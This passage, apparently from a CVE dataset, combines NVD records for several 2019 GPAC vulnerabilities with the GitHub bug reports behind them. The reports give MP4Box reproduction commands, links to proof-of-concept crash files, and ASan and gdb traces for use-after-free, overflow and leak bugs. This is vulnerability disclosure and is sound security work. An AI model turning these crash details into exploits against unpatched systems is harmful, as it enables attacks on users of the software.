(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6c393f in gf_isom_box_del isomedia/box_funcs.c:1508 previously allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xae2b8d in stco_New isomedia/box_code_base.c:5616 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_funcs.c:1734 gf_isom_box_dump_ex Shadow bytes around the buggy address: 0x0c0c7fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d90: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 =>0x0c0c7fff9dc0: 00 00 00 04 fa fa fa fa fd fd[fd]fd fd fd fd fa 0x0c0c7fff9dd0: fa fa fa fa 00 00 00 00 00 00 00 04 fa fa fa fa 0x0c0c7fff9de0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9df0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==27857==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: heap-use-after-free in gf_isom_box_dump_ex isomedia/box_funcs.c:1734
https://api.github.com/repos/gpac/gpac/issues/1333/comments
4
2019-11-09T11:21:05Z
2020-01-16T22:33:39Z
https://github.com/gpac/gpac/issues/1333
520,394,786
1,333
CVE-2019-20169
2019-12-31T00:15:13.087
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a use-after-free in the function trak_Read() in isomedia/box_code_base.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1329" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1329
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-trak_Read ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-trak_Read gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x0000000000505aee in stco_dump () (gdb) bt #0 0x0000000000505aee in stco_dump () #1 0x0000000000514918 in gf_isom_box_dump_ex () #2 0x0000000000502e15 in gf_isom_box_array_dump () #3 0x00000000005149dc in gf_isom_box_dump_done () #4 0x0000000000503a1b in stbl_dump () #5 0x0000000000514918 in gf_isom_box_dump_ex () #6 0x0000000000502e15 in gf_isom_box_array_dump () #7 0x00000000005149dc in gf_isom_box_dump_done () #8 0x000000000050615d in minf_dump () #9 0x0000000000514918 in gf_isom_box_dump_ex () #10 0x0000000000502e15 in gf_isom_box_array_dump () #11 0x00000000005149dc in gf_isom_box_dump_done () #12 0x000000000050644d in mdia_dump () #13 0x0000000000514918 in gf_isom_box_dump_ex () #14 0x0000000000502e15 in gf_isom_box_array_dump () #15 0x00000000005149dc in gf_isom_box_dump_done () #16 0x000000000050435f in trak_dump () #17 0x0000000000514918 in gf_isom_box_dump_ex () #18 0x0000000000502e15 in gf_isom_box_array_dump () #19 0x00000000005149dc in gf_isom_box_dump_done () #20 0x000000000050337a in moov_dump () #21 0x0000000000514918 in gf_isom_box_dump_ex () #22 0x0000000000502f10 in gf_isom_dump () #23 0x0000000000425faa in dump_isom_xml () #24 0x000000000041c69a in mp4boxMain () #25 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #26 0x000000000040eba9 in _start () ``` ASAN info: ```C ==27939==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000eea0 at pc 0x000000aea883 bp 0x7fffffff7f90 sp 0x7fffffff7f80 READ of size 4 at 0x60600000eea0 thread T0 #0 0xaea882 in trak_Read isomedia/box_code_base.c:7148 #1 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #4 0xadc064 in moov_Read isomedia/box_code_base.c:3745 #5 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #6 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #7 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #8 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #9 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #10 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #11 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #12 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #13 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60600000eea0 is located 0 bytes inside of 56-byte region [0x60600000eea0,0x60600000eed8) freed by thread T0 here: #0 0x7ffff6f022ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6c393f in gf_isom_box_del isomedia/box_funcs.c:1508 previously allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xae2b8d in stco_New isomedia/box_code_base.c:5616 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_code_base.c:7148 trak_Read Shadow bytes around the buggy address: 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9dc0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 04 =>0x0c0c7fff9dd0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9de0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9df0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==27939==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d asan ``` [iso file] Box "stco" (start 817) has 142 extra bytes [iso file] Track with no sample description box ! ================================================================= ==11412==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000eea0 at pc 0x000000aee083 bp 0x7fffffff7f70 sp 0x7fffffff7f60 READ of size 4 at 0x60600000eea0 thread T0 #0 0xaee082 in trak_Read isomedia/box_code_base.c:7153 #1 0x6c4ade in gf_isom_box_read isomedia/box_funcs.c:1529 #2 0x6c4ade in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x6c552c in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #4 0xadf844 in moov_Read isomedia/box_code_base.c:3745 #5 0x6c5e84 in gf_isom_box_read isomedia/box_funcs.c:1529 #6 0x6c5e84 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #7 0x6c66e4 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #8 0x6dc060 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #9 0x6decb3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #10 0x6decb3 in gf_isom_open_file isomedia/isom_intern.c:615 #11 0x42f93d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_1de1f8d-0.9/applications/mp4box/main.c:4789 #12 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #13 0x41e278 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan_1de1f8d-0.9/bin/MP4Box+0x41e278) 0x60600000eea0 is located 0 bytes inside of 56-byte region [0x60600000eea0,0x60600000eed8) freed by thread T0 here: #0 0x7ffff6f022ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6c46af in gf_isom_box_del isomedia/box_funcs.c:1509 previously allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xae636d in stco_New isomedia/box_code_base.c:5616 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_code_base.c:7153 trak_Read Shadow bytes around the buggy address: 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9dc0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 04 =>0x0c0c7fff9dd0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9de0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9df0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==11412==ABORTING ``` --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: heap-use-after-free in trak_Read isomedia/box_code_base.c:7153
https://api.github.com/repos/gpac/gpac/issues/1329/comments
2
2019-11-09T11:15:44Z
2020-01-08T12:44:04Z
https://github.com/gpac/gpac/issues/1329
520,393,655
1,329
CVE-2019-20170
2019-12-31T00:15:13.213
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is an invalid pointer dereference in the function GF_IPMPX_AUTH_Delete() in odf/ipmpx_code.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1328" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1328
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-GF_IPMPX_AUTH_Delete ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-GF_IPMPX_AUTH_Delete gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x000000000056907e in gf_ipmpx_data_del () (gdb) bt #0 0x000000000056907e in gf_ipmpx_data_del () #1 0x000000000056aa7c in gf_ipmpx_data_parse () #2 0x000000000056274a in gf_odf_read_ipmp () #3 0x000000000055a076 in gf_odf_parse_descriptor () #4 0x000000000056503b in gf_odf_desc_read () #5 0x00000000006ca7b4 in esds_Read () #6 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #7 0x0000000000513e15 in gf_isom_parse_root_box () #8 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #9 0x000000000051c48c in gf_isom_open_file () #10 0x000000000041c082 in mp4boxMain () #11 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #12 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==27770==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000000a (pc 0x0000007bacbf bp 0x00000000000a sp 0x7fffffff8020 T0) #0 0x7bacbe in GF_IPMPX_AUTH_Delete odf/ipmpx_code.c:115 #1 0x7bacbe in delete_algo_list odf/ipmpx_code.c:363 #2 0x7bacbe in DelGF_IPMPX_MutualAuthentication odf/ipmpx_code.c:371 #3 0x7bacbe in gf_ipmpx_data_del odf/ipmpx_code.c:1853 #4 0x7bec88 in gf_ipmpx_data_parse odf/ipmpx_code.c:295 #5 0x7a9969 in gf_odf_read_ipmp odf/odf_code.c:2426 #6 0x795ce3 in gf_odf_parse_descriptor odf/descriptors.c:159 #7 0x7afc16 in gf_odf_desc_read odf/odf_codec.c:302 #8 0xad3fb3 in esds_Read isomedia/box_code_base.c:1256 #9 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #10 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #11 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #12 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #13 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #14 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #15 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #16 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV odf/ipmpx_code.c:115 GF_IPMPX_AUTH_Delete ==27770==ABORTING ``` Edit --- This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: heap-use-after-free in GF_IPMPX_AUTH_Delete odf/ipmpx_code.c:115
https://api.github.com/repos/gpac/gpac/issues/1328/comments
2
2019-11-09T11:14:15Z
2020-01-08T12:43:51Z
https://github.com/gpac/gpac/issues/1328
520,393,299
1,328
CVE-2019-20171
2019-12-31T00:15:13.307
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There are memory leaks in metx_New in isomedia/box_code_base.c and abst_Read in isomedia/box_code_adobe.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1337" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1337
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-memory-leak ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-memory-leak gdb info: ```C Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [iso file] Box "metx" size 15 (start 89) invalid (read 25) [iso file] Box "abst" size 24 (start 0) invalid (read 104) [iso file] Incomplete box abst - start 0 size 24 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Box "metx" size 15 (start 89) invalid (read 25) [iso file] Box "abst" size 24 (start 0) invalid (read 104) Truncated file - missing 24 bytes [Inferior 1 (process 6276) exited with code 01] ``` ASAN info: ```C ==26041==ERROR: LeakSanitizer: detected memory leaks Direct leak of 224 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xaefada in metx_New isomedia/box_code_base.c:8367 Direct leak of 8 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x792106 in abst_Read isomedia/box_code_adobe.c:95 #2 0xb62c63 (/bin/MP4Box+0xb62c63) Indirect leak of 32 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x46c27d in gf_list_new utils/list.c:602 Indirect leak of 16 byte(s) in 4 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7ffff63eb489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489) ``` SUMMARY: AddressSanitizer: 280 byte(s) leaked in 10 allocation(s). --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: 2 memory leaks of metx_New(), abst_Read()
https://api.github.com/repos/gpac/gpac/issues/1337/comments
3
2019-11-09T12:00:28Z
2020-01-08T13:26:12Z
https://github.com/gpac/gpac/issues/1337
520,403,921
1,337
CVE-2019-20208
2020-01-02T14:16:36.363
dimC_Read in isomedia/box_code_3gpp.c in GPAC 0.8.0 has a stack-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1348" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1348
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in box_code_3gpp.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [011-stack-dimC_Read1000](https://github.com/gutiniao/afltest/blob/master/011-stack-dimC_Read1000) The ASAN information is as follows: ``` ./MP4Box -diso 011-stack-dimC_Read1000 -out /dev/null ================================================================= ==3045==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e0d88d0 at pc 0x564b9b2d69fb bp 0x7fff6e0d8480 sp 0x7fff6e0d8470 WRITE of size 1 at 0x7fff6e0d88d0 thread T0 #0 0x564b9b2d69fa in dimC_Read isomedia/box_code_3gpp.c:1000 #1 0x564b9ae5bb35 in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x564b9ae5bb35 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x564b9ae5c1e4 in 